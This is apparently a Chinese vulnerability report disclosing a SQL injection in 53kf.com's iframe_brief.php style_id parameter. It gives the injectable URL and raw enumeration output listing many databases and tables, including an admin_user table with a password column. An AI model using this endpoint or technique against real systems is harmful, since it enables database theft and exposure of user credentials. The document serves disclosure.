### 简要描述:
53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~借用一下clzzy的描述就不打字了!求礼物
### 详细说明:
53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~借用一下clzzy的描述就不打字了!求礼物
### 漏洞证明:
Target: http://kf1.53kf.com/iframe_brief.php?style_id=%Inject_Here%&language=cn10009
Date: 2012/10/11 10:24:38
DB Detection: MySQL >=5 (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
------------------------------------------------------
数据表
talk
Table Name Columns
C3P0TestTable
access
access_log
account_switch
ad
agent_oper
agent_style_lock
announcement
area_kf
ask_kw
autoreply
block_user id company_id guest_id guest_ip start_time release_time block_reason id6d block_trace
chat_nation
chat_search
chat_tables
chat_worker
company
company_ad
company_config
company_etel
company_style
company_tinet
company_tinet_cno
conf_ip1
conf_ip1_old
conf_sync
config_id_remark
config_value_remark
counter
cus_bill
cus_group
cus_link
cus_mail
cus_sms
cus_theme
cus_user
cus_web_msg
customer
customer2
customer3
cyy
cyy_group
daemonlog_recv
daemonlog_send
download_job
email
err_infos
err_infos_kf
etel_logo
face
file
identity
identity_role_id
ill_words
imessage
inner_identity
kehu_mail
kf_group
kf_group_newthing
kf_group_newthing_old
kf_group_upload
kf_group_upload_old
kf_share
link
link_room
logo
logsql
mail_template
mailqueue
message
module
module_special
msg_reply
operate_log
payment
robot
robot_mem
room_message
sms_bill
sms_config
sms_lword
sql_sync
stat_keyword_month
stat_place
stat_search
stat_search_old
stat_to
statistic
statistic_from
statistic_nation
statistic_net
sta
information_schema
Table Name Columns
acc
Table Name Columns
C3P0TestTable
cus_user
visitor_trace
crm
Table Name Columns
action_log
conf_sync
crm_ViewDt
crm_ViewDt_bank
crm_column
crm_cust_field
crm_cust_linkman
crm_customer
crm_customer_bak
crm_customer_bak2
crm_customer_keywordisnull
crm_data_char
crm_data_int
crm_data_item
crm_downexport
crm_fieldDt
crm_keyword
crm_linkman
crm_linkman_ViewDt
crm_linkman_ViewDt_bank
crm_linkman_column
crm_linkman_field
crm_linkman_fieldDt
crm_linkman_view
crm_manage_module
crm_order
crm_public_field
crm_survey
crm_survey_info
crm_survey_question
crm_survey_range
crm_survey_result
crm_view
cus_bill
cus_link
cus_mail
cus_sms
cus_theme
daemonlog_recv
daemonlog_send
mailqueue
operate_log
setting
help
Table Name Columns
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
income
Table Name Columns
check_flow
check_log
check_method
expend
expend_check_flow
expend_summary
income
operate_log
sort
summary
ip
Table Name Columns
_city_ip
city_ip
city_ip0
city_ip10
city_ip13
city_ip16
city_ip19
city_ip22
city_ip25
city_ip28
city_ip31
city_ip34
city_ip37
code_country
country_ip
new_ip
new_ip2
ip_src
Table Name Columns
city_ip0
city_ip10
city_ip13
city_ip16
city_ip19
city_ip22
city_ip25
city_ip28
city_ip31
city_ip34
city_ip37
code_country
country_ip
jianyi
Table Name Columns
jy_feedback
jy_feedback_index
jy_field
jy_logs
jy_role
jy_tpl
jy_userinfo
job
Table Name Columns
qs_ad
qs_ad_category
qs_admin
qs_admin_log
qs_article
qs_article_category
qs_article_property
qs_category
qs_category_district
qs_category_group
qs_category_jobs
qs_company_down_resume
qs_company_favorites
qs_company_interview
qs_company_profile
qs_config
qs_explain
qs_explain_category
qs_feedback
qs_jobs
qs_jobs_contact
qs_link
qs_link_category
qs_locoyspider
qs_mail_templates
qs_mailconfig
qs_members
qs_members_info
qs_members_points
qs_members_points_report
qs_members_points_rule
qs_members_setmeal
qs_members_type
qs_navigation
qs_navigation_category
qs_notice
qs_notice_category
qs_order
qs_page
qs_payment
qs_personal_favorites
qs_personal_jobs_apply
qs_report
qs_resume
qs_resume_education
qs_resume_jobs
qs_resume_training
qs_resume_work
qs_setmeal
qs_text
kf
Table Name Columns
53kf_sync
access_log_tgfj
ad
ad_manage
ad_stat
admin_agent
admin_group
admin_logs
admin_oper
admin_recharge_bill
admin_role
admin_tinet_article
admin_user id user_name real_name password add_time last_login last_ip role_id is_admin recharge_money recharge_coupon
agent_apply
agent_bbs id worker_id author title content click rep_num type date last_poster last_date
agent_bbs_message
agent_bill
agent_bill_log
agent_bill_old
agent_check_bill
agent_check_money
agent_comment
agent_company
agent_config
agent_download
agent_group
agent_handle_log
agent_oper
agent_oper_inf
agent_oper_log
agent_policy
agent_price_config
agent_receipt_bill
agent_receipt_express
agent_rights
agent_style_lock
agent_worker
announcement
appointment
area_kf
ask_act_log
authentication
auto_pay_fail_log
autoreply
bank_infor
blacklist
blacklist_log
bug_reply_log
bug_report
bug_report_log
category
city_app
city_case
classic_case
click_ip
company
company_account
company_ad
company_bill
company_bill_old
company_config
company_coupon
company_cyy
company_etel
company_etel_bill
company_exp_vouchers
company_exp_vouchers_bill
company_exp_vouchers_code
company_extra
company_lottery
company_lottery_address
company_lottery_log
company_mail
company_mail_bill
company_operation_log
company_receipt_bill
company_recharge_gift
company_sms
company_sms_bill
company_style
company_template
company_tinet
company_tinet_bill
company_tinet_cno
company_tinet_open
company_tinet_sms
company_tinet_time
conf_ip1
conf_ip1_bak
conf_sync
conf_sync_ip
config_id_remark
config_value_remark
consumption_stat
coupon_bill
cps_commission_log
cps_netraffic
crm_senduser
cus_group
customer
customer_bill
customer_link
daemonlog_recv
daemonlog_send
dingxin
err_infos
etel_logo
face
friendlink
gggj_spread_log
gift_module_log
gm_admin
gm_company
gm_group
gm_info
help
identity
index_hot
kf_admin
kf_center_check
kf_class
kf_company
kf_group
kf_handle_log
kf_info
kf_qytx_group
kf_sell
login_from_vb
logo
logsql
lost_company
mail_template
manage_salelist
member
member_grade_config
menu
mobile_record
module
module2
module_bag
module_open_setting
module_recharge_log
module_special
module_style_num_bak
module_test_log
module_try_days
order
order_cancel
order_product
outlink_withdrawing_log
package_product
pay_company
pay_company_bymonth
pay_company_old
payment
payment2
payment_multy
product
product_commend
product_exp
product_group
product_img
product_price
product_promote
product_pub
product_recharge_center
product_review
product_review_replay
product_sell_stat
purge_cache
reg_error
reg_sync
reply
report_badweb
review_award
robot
robot_mem
sales_area
slave_to_master_sync
sms_bill
sms_config
sms_send_log
sms_sp
suggest
suggest_old
suggest_reply
suggest_reply_old
suggest_type
sys_name
system_module
talk_subject
tmp_smslog
topic
union_company
unsubscribe_company
v5_ad
v5_admin_oper
v5_agent_oper
v5_cate
v5_cate_stat
v5_comment
v5_comment_del
v5_company
v5_company_account
v5_company_bill
v5_company_cate
v5_company_config
v5_company_indus
v5_company_refer
v5_company_talk
v5_doctor
v5_favor
v5_friend
v5_hotinfos
v5_indus
v5_ip
v5_jubao
v5_leave
v5_net_ad
v5_person
v5_person_bill
v5_person_cate
v5_product
v5_refer
v5_reply
v5_subject
v5_sync
v5_system_info
v5_test
v5_worker
vip_refer_sync
worker
worker_config
worker_group
worker_point_log
zs_admin
zs_class
zs_company
zs_group
zs_help
zs_info
zsk_category
zsk_key
zsk_question
kf1
Table Name Columns
ad_count
ad_count2
city_company
daemon
daemon_sms
finance_bill
inout_class
inout_site
inout_stat
kf_tuo
kf_tuo070416
kf_tuo_log
kf_tuo_mark
kf_tuo_rank
lottery
mailqueue
oper_log
rank
sms_lword
sms_queue
talk_server
v5_chat_count
worker
mail
Table Name Columns
mail_account
mail_checkuser
mail_classify
mail_config
mail_filter
mail_linkman
mail_log
mail_receiver
mail_record
mail_role
mail_sendmail
mail_senduser
mail_share
mail_template
mantis
Table Name Columns
mantis_bug_file_table
mantis_bug_history_table
mantis_bug_monitor_table
mantis_bug_relationship_table
mantis_bug_revision_table
mantis_bug_table
mantis_bug_tag_table
mantis_bug_text_table
mantis_bugnote_table
mantis_bugnote_text_table
mantis_category_table
mantis_config_table
mantis_custom_field_project_table
mantis_custom_field_string_table
mantis_custom_field_table
mantis_email_table
mantis_filters_table
mantis_news_table
mantis_plugin_table
mantis_project_file_table
mantis_project_hierarchy_table
mantis_project_table
mantis_project_user_list_table
mantis_project_version_table
mantis_sponsorship_table
mantis_tag_table
mantis_tokens_table
mantis_user_pref_table
mantis_user_print_pref_table
mantis_user_profile_table
mantis_user_table
mysql
Table Name Columns
newadv
Table Name Columns
accountdt
alert_config
back_money
blacklist
cart
favorites
history_order
history_orderdt
income_money
mylink
new_order
new_orderdt
pay_money
recharge_money
sys_config
user
webpage
website
website_type
withdrawing_money
newcrm
Table Name Columns
client_class
crm_area
crm_birthday_tip
crm_contact_record_status
crm_cust_com
crm_cust_linkman
crm_cust_share
crm_customer
crm_customer_care
crm_customer_column
crm_customer_contact
crm_customer_d1
crm_customer_field
crm_customer_fieldAt
crm_customer_fieldDt
crm_customer_view
crm_delivery
crm_delivery_addr
crm_downcenter
crm_email_link
crm_email_read
crm_field_set
crm_kf_complaint
crm_kf_complaint_type
crm_kf_record
crm_kf_server_type
crm_kf_server_way
crm_kf_time_spend
crm_kf_urgency_type
crm_linkman
crm_linkman_column
crm_linkman_d1
crm_linkman_field
crm_linkman_fieldAt
crm_linkman_fieldDt
crm_linkman_view
crm_logs
crm_marketing_activity
crm_marketing_activity_type
crm_marketing_plan
crm_marketing_plan_status
crm_marketing_plan_type
crm_money_record
crm_opport
crm_opport_source
crm_opport_stage
crm_opport_status
crm_order_addr
crm_order_info
crm_order_invoice
crm_order_order_sort
crm_order_pay_method
crm_orders
crm_plan
crm_porduct_unit
crm_product
crm_product_sort
crm_quote
crm_quote_info
crm_senduser
crm_sfa_log
crm_sfa_program
crm_sfa_program_pc
crm_sfa_xulie
crm_sfa_xulie_pc
crm_table_num
crm_task
crm_task_plan_type
crm_tasks
crm_tool_knowledge
crm_tool_knowledge_category
crm_tool_mail_receiver
crm_tool_notebook
crm_tool_reportdiy
crm_tool_sendemail
crm_tool_sendsms
crm_tool_sms_receiver
crm_tool_template
crm_tool_template_sms
crm_workbench
customer_sort
dictionary
dictionary_relation
permission
setting
newoa
Table Name Columns
company
identity
module
oa_affair_weight
oa_asset_flow
oa_assets
oa_assets_depreciation
oa_assets_type
oa_attachment
oa_attachment_temp
oa_book
oa_book_type
oa_bookdt
oa_company_protal
oa_doc_group
oa_doc_identity
oa_doc_worker
oa_document
oa_favorite_flow
oa_fieldarea
oa_flow
oa_flow_default_worker
oa_flowdt
oa_flowfield
oa_flowgroup
oa_flowjob
oa_flownode
oa_flowstate
oa_goods
oa_goods_type
oa_inform_set
oa_layer_attribute
oa_linkman
oa_linkman_group
oa_linkmangroup_acc_dpt
oa_linkmangroup_acc_role
oa_linkmangroup_acc_worker
oa_mail
oa_mail_account
oa_mail_sys
oa_mode_layer
oa_msg
oa_msg_receiver
oa_my_tools
oa_news
oa_news_reply
oa_news_worker
oa_nodejob
oa_nodeport
oa_notice
oa_notice_group
oa_notice_id6d
oa_notice_identity
oa_notice_worker
oa_parameter
oa_pay
oa_pay_option
oa_portfield
oa_print_mode
oa_report
oa_report_filter
oa_report_item
oa_reportjob
oa_response_time
oa_task
oa_task_affix
oa_task_group
oa_task_looker
oa_task_msg
oa_task_msg_affix
oa_task_postpone
oa_task_state
oa_task_temp
oa_task_worker
oa_telephone_msg
oa_telephone_msg_sys
oa_template
oa_templatedt
oa_view
oa_viewdt
oa_weather_forecast
oa_worker_pay
oa_worker_protal
oa_workflow
oa_workflow_log
oa_workflow_logdt
oa_workflow_operationlog
oa_workflow_worker
operate_log
permission
worker
worker_group
worker_online_log
saas
Table Name Columns
cus_sms
identity
operate_log
role
worker
worker_group
shouzhi
Table Name Columns
sz_account
sz_baoxiao
sz_baoxiao_detail
sz_baoxiao_sort
sz_in
sz_in_detail
sz_inout_sort
sz_log
sz_memo
sz_out
sz_out_detail
sz_role
sz_setting
sz_summary
sz_wage
sms
Table Name Columns
sms_balance
sms_blacklist
sms_classify
sms_config
sms_disabled
sms_linkman
sms_log
sms_phrase
sms_receivemsg
sms_record
sms_role
sms_sendmsg
sms_sendway
sms_share
tel
Table Name Columns
tel_blacklist
tel_config
tel_log
tel_number
tel_queue
tel_recharge
tel_role
tel_seat
tel_seat_period
tel_sendmsg
tel_style
temp_mu
Table Name Columns
com_talk_online
company
test
Table Name Columns
trac
Table Name Columns
attachment
auth_cookie
cache
component
enum
fullblog_comments
fullblog_posts
milestone
node_change
permission
report
repository
revision
session
session_attribute
system
ticket
ticket_change
ticket_custom
version
wiki
ut
Table Name Columns
account_switch
area_kf
block_user
chat_nation
chat_search
chat_worker
company
company_ad
company_config
company_style
company_tinet
company_tinet_cno
cus_bill
cus_group
cus_link
cus_theme
cus_user
cus_web_msg
cyy
cyy_group
file
identity
imessage
kf_group
kf_group_newthing
kf_group_upload
kf_share
link
message
module
module_special
msg_reply
operate_log
robot
robot_mem
sms_config
stat_keyword_month
stat_place
stat_search
stat_to
statistic
statistic_from
statistic_nation
statistic_net
statistic_place
talk_his
talk_theme
talk_vote
visitor_lnk
visitor_trace
worker
worker_config
worker_group
worker_online_log
worker_online_log_detail
zsk_category
zsk_key
zsk_noanswer
zsk_question
ut1
Table Name Columns
message
sync_worker_stat
sync_worker_stat2
talk_his
worker
ut_cus
Table Name Columns
cus_user
utt
Table Name Columns
message
message_d1
message_d2
message_d3
message_d4
message_d5
message_d6
talk_his
talk_his_d1
talk_his_d2
talk_his_d3
talk_his_d4
talk_his_d5
talk_his_d6
utwkbak
Table Name Columns
company_config
worker
zentao
Table Name Columns
zt_action
zt_bug
zt_build
zt_burn
zt_case
zt_caseStep
zt_company
zt_config
zt_dept
zt_doc
zt_docLib
zt_effort
zt_extension
zt_file
zt_group
zt_groupPriv
zt_history
zt_module
zt_product
zt_productPlan
zt_project
zt_projectProduct
zt_projectStory
zt_release
zt_story
zt_storySpec
zt_task
zt_taskEstimate
zt_team
zt_testResult
zt_testRun
zt_testTask
zt_todo
zt_user
zt_userGroup
zt_userQuery
zt_userTPL
暂无评论